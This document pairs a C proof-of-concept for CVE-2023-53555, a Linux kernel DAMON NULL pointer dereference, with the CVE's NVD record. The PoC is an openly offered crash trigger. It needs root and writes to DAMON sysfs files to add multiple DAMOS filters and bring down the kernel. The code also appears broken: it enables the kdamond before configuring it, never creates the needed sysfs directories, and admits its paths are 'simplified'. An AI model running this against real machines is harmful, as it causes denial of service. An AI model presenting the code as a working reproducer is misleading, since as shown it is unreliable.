CVE-2023-53555

// CVE-2023-53555 PoC - Trigger NULL pointer dereference via DAMON sysfs interface // This PoC demonstrates how to trigger the vulnerability by adding multiple DAMOS filters // through the sysfs interface, causing uninitialized list field access. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> // Path to DAMON sysfs interface (requires root or appropriate permissions) #define DAMON_BASE_PATH "/sys/kernel/mm/damon/admin/kdamonds" // Function to write a string value to a sysfs file int write_sysfs(const char *path, const char *value) { int fd = open(path, O_WRONLY); if (fd < 0) { fprintf(stderr, "Failed to open %s: %s\n", path, strerror(errno)); return -1; } if (write(fd, value, strlen(value)) < 0) { fprintf(stderr, "Failed to write to %s: %s\n", path, strerror(errno)); close(fd); return -1; } close(fd); return 0; } // Function to trigger the vulnerability by adding multiple DAMOS filters int trigger_damon_filter_vuln(void) { char path[512]; int ret; // Step 1: Initialize a DAMON context (simplified - actual paths may vary) printf("[*] Setting up DAMON kdamond...\n"); snprintf(path, sizeof(path), "%s/0/state", DAMON_BASE_PATH); ret = write_sysfs(path, "on"); if (ret < 0) { // Try alternative path structure printf("[*] Trying alternative path structure...\n"); } // Step 2: Add multiple DAMOS filters to trigger uninitialized list access // The vulnerability is triggered when adding the 2nd or subsequent filter printf("[*] Adding first DAMOS filter...\n"); snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/0/type", DAMON_BASE_PATH); write_sysfs(path, "anon"); snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/0/matching", DAMON_BASE_PATH); write_sysfs(path, "true"); // Step 3: Add a second filter - this triggers the NULL pointer dereference // because the list field of the first filter was not properly initialized printf("[*] Adding second DAMOS filter (triggering vulnerability)...\n"); snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/1/type", DAMON_BASE_PATH); write_sysfs(path, "memcg"); snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/1/matching", DAMON_BASE_PATH); write_sysfs(path, "true"); printf("[*] Vulnerability triggered - check dmesg for kernel panic\n"); return 0; } int main(int argc, char *argv[]) { printf("CVE-2023-53555 PoC - DAMON filter NULL pointer dereference\n"); printf("WARNING: This may crash your system!\n\n"); if (getuid() != 0) { fprintf(stderr, "This PoC requires root privileges to access DAMON sysfs\n"); return 1; } return trigger_damon_filter_vuln(); }

{"cve": {"id": "CVE-2023-53555", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.813", "lastModified": "2026-03-23T18:41:06.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/core: initialize damo_filter->list from damos_new_filter()\n\ndamos_new_filter() is not initializing the list field of newly allocated\nfilter object. However, DAMON sysfs interface and DAMON_RECLAIM are not\ninitializing it after calling damos_new_filter(). As a result, accessing\nuninitialized memory is possible. Actually, adding multiple DAMOS filters\nvia DAMON sysfs interface caused NULL pointer dereferencing. Initialize\nthe field just after the allocation from damos_new_filter()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.4.11", "matchCriteriaId": "BABFF7E7-8B93-4535-8736-4A0995E9781C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5f1fc67f2cb8d3035d3acd273b48b97835af8afd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da7beebb49c643cd03c54447ed66595936a7a1ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}